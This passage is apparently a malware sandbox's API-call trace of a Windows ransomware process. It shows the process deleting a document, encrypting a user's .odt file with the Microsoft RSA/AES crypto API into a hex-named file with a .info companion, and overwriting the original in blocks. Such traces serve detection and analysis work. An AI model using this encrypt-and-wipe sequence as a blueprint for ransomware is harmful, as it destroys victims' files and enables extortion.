HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", lpFilePart=0x0) returned 0x3e [0072.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0072.586] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cybkl1jd2-ucw0jgb.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0072.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0072.586] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0073.041] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", lpFilePart=0x0) returned 0x3e [0073.336] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cybkl1jd2-ucw0jgb.pptx")) returned 1 [0073.338] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyBKL1Jd2-UCW0JGB.pptx", lpFilePart=0x0) returned 0x3e [0073.338] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9", lpFilePart=0x0) returned 0x48 [0073.338] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0073.338] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7da8fedb9e07bf9f876d8d74e3d9d3d9"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.339] GetFileType (hFile=0x36c) returned 0x1 [0073.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0073.339] GetFileType (hFile=0x36c) returned 0x1 [0073.339] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0073.339] CloseHandle (hObject=0x36c) returned 1 [0073.339] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9", lpFilePart=0x0) returned 0x48 [0073.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0073.339] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7da8fedb9e07bf9f876d8d74e3d9d3d9"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.339] GetFileType (hFile=0x36c) returned 0x1 [0073.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0073.339] GetFileType (hFile=0x36c) returned 0x1 [0073.339] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0073.339] CloseHandle (hObject=0x36c) returned 1 [0073.340] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9", lpFilePart=0x0) returned 0x48 [0073.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0073.340] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7DA8FEDB9E07BF9F876D8D74E3D9D3D9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7da8fedb9e07bf9f876d8d74e3d9d3d9"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.340] GetFileType (hFile=0x36c) returned 0x1 [0073.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0073.340] GetFileType (hFile=0x36c) returned 0x1 [0073.340] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0073.340] CloseHandle (hObject=0x36c) returned 1 [0073.340] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", lpFilePart=0x0) returned 0x31 [0073.341] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", lpFilePart=0x0) returned 0x31 [0073.341] CryptAcquireContextW (in: phProv=0x1bf5da68, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5da68*=0x1a5b8010) returned 1 [0073.342] CryptImportKey (in: hProv=0x1a5b8010, pbData=0x244b7a8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a626ad0) returned 1 [0073.342] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0073.342] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0073.342] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x244b898, pdwDataLen=0x1bf5db30 | out: pbData=0x244b898*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0073.342] CryptImportKey (in: hProv=0x1a5b8010, pbData=0x244b9b8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626a60) returned 1 [0073.342] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0073.343] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0073.343] CryptDuplicateKey (in: hKey=0x1a626a60, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x4ce9f0) returned 1 [0073.343] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0073.343] CryptSetKeyParam (hKey=0x4ce9f0, dwParam=0x4, pbData=0x244bb00*=0x1, dwFlags=0x0) returned 1 [0073.343] CryptSetKeyParam (hKey=0x4ce9f0, dwParam=0x1, pbData=0x244bab0, dwFlags=0x0) returned 1 [0073.343] CryptDestroyKey (hKey=0x1a626a60) returned 1 [0073.343] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0073.343] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", lpFilePart=0x0) returned 0x31 [0073.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0073.343] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e2bji.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.343] GetFileType (hFile=0x36c) returned 0x1 [0073.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0073.343] GetFileType (hFile=0x36c) returned 0x1 [0073.343] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D", lpFilePart=0x0) returned 0x48 [0073.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0073.343] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\096df9ee6521afcc89361f2d4c608b0d"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x380 [0073.344] GetFileType (hFile=0x380) returned 0x1 [0073.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0073.344] GetFileType (hFile=0x380) returned 0x1 [0073.345] ReadFile (in: hFile=0x36c, lpBuffer=0x244bea0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x244bea0*, lpNumberOfBytesRead=0x1bf5da28*=0x14000, lpOverlapped=0x0) returned 1 [0073.347] CryptEncrypt (in: hKey=0x4ce9f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x245feb8*, pdwDataLen=0x1bf5da80*=0x14000, dwBufLen=0x14000 | out: pbData=0x245feb8*, pdwDataLen=0x1bf5da80*=0x14000) returned 1 [0073.347] WriteFile (in: hFile=0x380, lpBuffer=0x245feb8*, nNumberOfBytesToWrite=0x14000, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x245feb8*, lpNumberOfBytesWritten=0x1bf5da18*=0x14000, lpOverlapped=0x0) returned 1 [0073.349] ReadFile (in: hFile=0x36c, lpBuffer=0x244bea0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x244bea0*, lpNumberOfBytesRead=0x1bf5da28*=0x859, lpOverlapped=0x0) returned 1 [0073.402] CryptEncrypt (in: hKey=0x4ce9f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2153970*, pdwDataLen=0x1bf5da80*=0x850, dwBufLen=0x850 | out: pbData=0x2153970*, pdwDataLen=0x1bf5da80*=0x850) returned 1 [0073.402] ReadFile (in: hFile=0x36c, lpBuffer=0x213f918, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x213f918*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0073.402] CryptEncrypt (in: hKey=0x4ce9f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2155218*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x2155218*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0073.402] CryptEncrypt (in: hKey=0x4ce9f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2155268*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x2155268*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0073.402] WriteFile (in: hFile=0x380, lpBuffer=0x2154200*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x2154200*, lpNumberOfBytesWritten=0x1bf5d948*=0x860, lpOverlapped=0x0) returned 1 [0073.403] CloseHandle (hObject=0x380) returned 1 [0073.404] CloseHandle (hObject=0x36c) returned 1 [0073.405] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0073.405] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0073.405] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0073.405] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D", lpFilePart=0x0) returned 0x48 [0073.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0073.405] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\096df9ee6521afcc89361f2d4c608b0d"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.405] GetFileType (hFile=0x36c) returned 0x1 [0073.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0073.405] GetFileType (hFile=0x36c) returned 0x1 [0073.405] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.406] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.407] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.408] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.409] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.409] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.409] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.410] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.410] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.410] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.410] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.410] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.410] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.410] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.410] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.410] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.411] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.411] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.411] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.411] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.411] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x860, lpOverlapped=0x0) returned 1 [0073.411] ReadFile (in: hFile=0x36c, lpBuffer=0x2155998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2155998*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0073.411] CloseHandle (hObject=0x36c) returned 1 [0073.413] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D.info", lpFilePart=0x0) returned 0x4d [0073.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0073.426] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\096df9ee6521afcc89361f2d4c608b0d.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.426] GetFileType (hFile=0x36c) returned 0x1 [0073.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0073.426] GetFileType (hFile=0x36c) returned 0x1 [0073.426] WriteFile (in: hFile=0x36c, lpBuffer=0x2162048*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x2162048*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0073.427] CloseHandle (hObject=0x36c) returned 1 [0073.431] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", lpFilePart=0x0) returned 0x31 [0073.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0073.432] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e2bji.odt"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b8788b0, ftCreationTime.dwHighDateTime=0x1d4d190, ftLastAccessTime.dwLowDateTime=0xc67168b0, ftLastAccessTime.dwHighDateTime=0x1d4d071, ftLastWriteTime.dwLowDateTime=0xc67168b0, ftLastWriteTime.dwHighDateTime=0x1d4d071, nFileSizeHigh=0x0, nFileSizeLow=0x14859)) returned 1 [0073.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0073.432] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", lpFilePart=0x0) returned 0x31 [0073.432] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", dwFileAttributes=0x80) returned 1 [0073.432] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", lpFilePart=0x0) returned 0x31 [0073.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0073.432] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e2bji.odt"), fInfoLevelId=0x0, lpFileInformation=0x2169c20 | out: lpFileInformation=0x2169c20*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1b8788b0, ftCreationTime.dwHighDateTime=0x1d4d190, ftLastAccessTime.dwLowDateTime=0xc67168b0, ftLastAccessTime.dwHighDateTime=0x1d4d071, ftLastWriteTime.dwLowDateTime=0xc67168b0, ftLastWriteTime.dwHighDateTime=0x1d4d071, nFileSizeHigh=0x0, nFileSizeLow=0x14859)) returned 1 [0073.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0073.432] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", lpFilePart=0x0) returned 0x31 [0073.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0073.432] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e2bji.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.432] GetFileType (hFile=0x36c) returned 0x1 [0073.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0073.432] GetFileType (hFile=0x36c) returned 0x1 [0073.432] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0073.433] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.434] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.435] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.435] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.436] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.437] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, 